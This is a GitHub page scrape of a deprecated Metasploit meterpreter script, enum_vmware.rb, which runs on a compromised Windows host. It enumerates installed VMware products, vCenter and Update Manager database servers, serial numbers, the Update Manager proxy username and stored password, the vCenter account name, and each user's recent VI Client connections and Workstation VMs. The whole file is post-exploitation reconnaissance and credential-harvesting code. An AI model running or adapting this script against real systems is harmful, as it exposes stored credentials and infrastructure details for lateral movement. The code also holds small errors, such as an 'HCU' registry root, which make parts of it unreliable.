forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathenum_vmware.rb
331 lines (310 loc) · 13.1 KB
/
enum_vmware.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to imporve this script, please try to port it as a post
# module instead. Thank you.
##
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@client = client
opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ]
)
opts.parse(args) { |opt, idx, val|
case opt
when "-h"
print_line("vmware_enum -- Enumerates VMware Configurations for VMware Products")
print_line("USAGE: run vmware_enum")
print_line(opts.usage)
raise Rex::Script::Completed
end
}
def check_prods()
key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\VMware, Inc.', KEY_READ)
sfmsvals = key.enum_key
print_status("The Following Products are installed on this host:")
sfmsvals.each do |p|
print_status("\t#{p}")
end
return sfmsvals
end
def check_vmsoft
installed = false
key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE', KEY_READ)
sfmsvals = key.enum_key
if sfmsvals.include?("VMware, Inc.")
print_status("VMware Products are Installed in Host")
installed = true
else
print_error("No VMware Products where found in this Host.")
end
key.close
return installed
end
def enum_vcenter
print_status("Information about Virtual Center:")
vc_dbuser = nil
vc_dbencpass = nil
vc_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","InstalledVersion")
vc_serial = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","Serial")
vc_dbinstance = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","DBInstanceName")
vc_dbtype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","DBServerType")
vc_tomcatver = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\Tomcat","Version")
vc_type = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","GroupType")
vc_odbcname = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","1")
vc_odbctype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","4")
# vc_odctrustcon = reg_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname}","TrustedConnection")
# print_line("*")
# if vc_odctrustcon.to_i != 1
# vc_dbuser = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","2")
# print_line("*")
# vc_dbencpass = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","3")
# print_line("*")
# end
vc_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname.chomp}","Database")
vc_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname.chomp}","Server")
print_status("\tVersion: #{vc_version}")
print_status("\tSerial: #{vc_serial}")
print_status("\tvCenter Type: #{vc_type}")
print_status("\tTomcat Version: #{vc_tomcatver}")
print_status("\tDatabase Instance: #{vc_dbinstance}")
print_status("\tDatabase Type: #{vc_dbtype}")
print_status("\tDatabase Name: #{vc_dbname}")
print_status("\tDatabase Server: #{vc_dbserver}")
print_status("\tODBC Name: #{vc_odbcname}")
print_status("\tODBC Type: #{vc_odbctype}")
# if vc_odctrustcon.to_i != 1
# print_status("\tODBC Username: #{vc_dbuser}")
# print_status("\tODBC Password: #{vc_dbencpass}")
# end
end
def enum_viclient
print_status("Information about VMware VI Client:")
vi_pluggins = nil
begin
vi_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\4.0","InstalledVersion")
vi_pluggins = registry_enumvals("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\Plugins")
rescue
end
print_status("\tVersion: #{vi_version}")
if vi_pluggins
vi_pluggins.each do |pi|
if pi=~ /Converter/
print_status("\tPlugin: VMware Converter")
elsif pi =~/UM/
print_status("\tPlugin: VMware Update Manager")
else
print_status("\tPlugin: #{pi}")
end
end
end
if not is_system?
recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
print_status("Recent VI Client Connections:")
recentconns.each do |c|
print_status("\t#{c}")
end
ignore_ssl = registry_enumkeys("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore")
if ignore_ssl.length > 0
print_status("\tIgnored SSL Certs for")
ignore_ssl.each do |issl|
ssl_key = registry_getvaldata("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
end
end
else
user_sid = []
key = "HKU\\"
root_key, base_key = @client.sys.registry.splitkey(key)
open_key = @client.sys.registry.open_key(root_key, base_key)
keys = open_key.enum_key
keys.each do |k|
user_sid << k if k =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/
end
user_sid.each do |us|
begin
enumed_user = registry_getvaldata("HKU\\#{us}\\Volatile Environment","USERNAME")
print_status("\tRecent VI Client Connections for #{enumed_user}:")
recentconns = registry_getvaldata("HKU\\#{us}\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
recentconns.each do |c|
print_status("\t#{c}")
end
ignore_ssl = registry_enumkeys("HKU\\#{us}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore")
if ignore_ssl.length > 0
print_status("\tIgnored SSL Certs for #{enumed_user}:")
ignore_ssl.each do |issl|
ssl_key = registry_getvaldata("HCU\\#{us}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
end
end
rescue
print_status("\tUser appears to have not used the software.")
end
end
end
end
def enum_vum
print_status("Information about VMware Update Manager:")
begin
vum_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","InstalledVersion")
vum_server = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VUMServer")
vum_dbtype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","DBServerType")
vum_direct2web = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","DirectWebAccess")
vum_useproxy = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","UseProxy")
vum_proxyserver = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyServer")
vum_proxyport = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyPort")
vum_proxyuser = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyUserName")
vum_proxypass = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyPassword")
vum_vcentersrv = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VCServer")
vum_vcenterusr = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VCUserName")
vum_patchstore = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","PatchStore")
vum_odbcname = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","1")
vum_odbctype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","4")
vum_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","Database")
vum_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","Server")
# vum_trustedcon = reg_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","TrustedConnection")
# if vum_trustedcon.to_i != 1
# vum_odbcusename = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","2")
# vum_odbcpass = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","3")
# end
print_status("\tVersion: #{vum_version}")
print_status("\tServer: #{vum_server}")
print_status("\tPatch Store: #{vum_patchstore}")
print_status("\tDatabse Type: #{vum_dbtype}")
print_status("\tUses Proxy: #{vum_useproxy}")
print_status("\tProxy User: #{vum_proxyuser}")
print_status("\tProxy Password: #{vum_proxypass}")
print_status("\tVirtual Center: #{vum_vcentersrv}")
print_status("\tVirtual Center User: #{vum_vcenterusr}")
print_status("\tProxy Server: #{vum_proxyserver}:#{vum_proxyport}")
print_status("\tDatabase Name: #{vum_dbname}")
print_status("\tDatabase Server: #{vum_dbserver}")
print_status("\tODBC Name: #{vum_odbcname}")
print_status("\tODBC Type: #{vum_odbctype}")
# print_status("\t ODBC Trusted: #{vum_trustedcon}")
# if vum_trustedcon.to_i != 1
# print_status("\tODBC Username: #{vum_odbcusename}")
# print_status("\tODBC Password: #{vum_odbcpass}")
# end
rescue ::Exception => e
print_status("Error: #{e.class} #{e}")
end
end
def enum_vdm
print_status("Information about VMware VDM Broker:")
vdm_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VDM","ProductVersion")
print_status("\tVersion: #{vdm_version}")
end
def enum_powercli
print_status("Information about PowerCLI:")
pcli_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstalledVersion")
pcli_install_path = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstallPath")
begin
pcli_poweshell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\WindowsPowerShell","ExecutionPolicy")
rescue
pcli_poweshell_policy = "Restricted"
end
print_status("\tVersion: #{pcli_version}")
print_status("\tInstalled Pat: #{pcli_install_path}")
print_status("\tPowershell Execution Policy: #{pcli_poweshell_policy}")
end
#Function to enumerate the users if running as SYSTEM
def enum_users
os = @client.sys.config.sysinfo['OS']
users = []
user = @client.sys.config.getuid
path4users = ""
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /7|Vista|2008/
path4users = sysdrv + "\\users\\"
profilepath = "\\AppData\\Local\\VMware\\"
else
path4users = sysdrv + "\\Documents and Settings\\"
profilepath = "\\Application Data\\VMware\\"
end
if user == "NT AUTHORITY\\SYSTEM"
print_status("Running as SYSTEM extracting user list..")
@client.fs.dir.foreach(path4users) do |u|
userinfo = {}
next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
userinfo['username'] = u
userinfo['userappdata'] = path4users + u + profilepath
users << userinfo
end
else
userinfo = {}
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo
end
return users
end
def enum_vihosupdt
hosts = []
print_status("Information about VMware vSphere Host Update Utility:")
enum_users.each do |u|
print_status("\tESX/ESXi Hosts added for Updates for user #{u['username']}:")
begin
@client.fs.dir.foreach(u['userappdata']+"VIU\\hosts\\") do |vmdir|
next if vmdir =~ /^(\.|\.\.)$/
print_status("\t#{vmdir}")
end
rescue
end
end
end
def enum_vmwarewrk
config = ""
name = ""
print_status("Enumerating VMware Workstation VM's:")
fav_file = ""
enum_users.each do |u|
print_status("\tVM's for user #{u['username']}:")
path = u['userappdata'].gsub(/Local/,"Roaming")
account_file = @client.fs.file.new(path + "\\favorites.vmls", "rb")
until account_file.eof?
fav_file << account_file.read
end
end
fav_file.each_line do |l|
if l =~ /config/
print_status("\tConfiguration File: #{l.scan(/vmlist\d*.config \= (\".*\")/)}")
end
if l =~ /Name/
print_status("\tVM Name: #{l.scan(/vmlist\d*.DisplayName \= (\".*\")/)}")
print_status("")
end
end
end
if client.platform =~ /win32|win64/
if check_vmsoft
vmware_products = check_prods()
if vmware_products.include?("VMware VirtualCenter")
enum_vcenter
end
if vmware_products.include?("VMware Virtual Infrastructure Client")
enum_viclient
end
if vmware_products.include?("VMware Update Manager")
enum_vum
end
if vmware_products.include?("VMware VDM")
enum_vdm
end
if vmware_products.include?("VMware vSphere PowerCLI")
enum_powercli
end
if vmware_products.include?("VMware vSphere Host Update Utility 4.0")
enum_vihosupdt
end
if vmware_products.include?("VMware Workstation")
enum_vmwarewrk
end
else
print_status("No VMware Products appear to be installed in this host")
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end